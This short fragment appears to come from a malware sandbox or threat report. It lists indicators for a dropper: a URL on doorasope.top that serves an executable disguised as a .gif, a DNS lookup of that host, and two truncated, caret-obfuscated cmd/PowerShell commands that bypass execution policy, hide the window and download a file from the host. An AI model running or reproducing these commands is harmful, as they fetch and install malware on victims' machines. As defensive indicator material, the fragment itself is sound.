Technical Information
- http://www.doorasope.top/read.php?f=1.gif as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "powE^Rs^H^El^l.^ExE^ -EXeCuTi^oNpo^L^i^CY^ ByPA^SS ^-^N^o^PROFil^e^ ^-WI^NDOWSt^yl^E^ ^HIDd^EN ^(^NeW^-Obje^ct SysTem^.NET.^wEb^CLi^ent)^.Dow^NL^OADfI^le^(^'http://www.door...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "powE^Rs^H^El^l.^ExE^ -EXeCuTi^oNpo^L^i^CY^ ByPA^SS ^-^N^o^PROFil^e^ ^-WI^NDOWSt^yl^E^ ^HIDd^EN ^(^NeW^-Obje^ct SysTem^.NET.^wEb^CLi^ent)^.Dow^NL^OADfI^le^(^'http://www.door...' (with hidden window)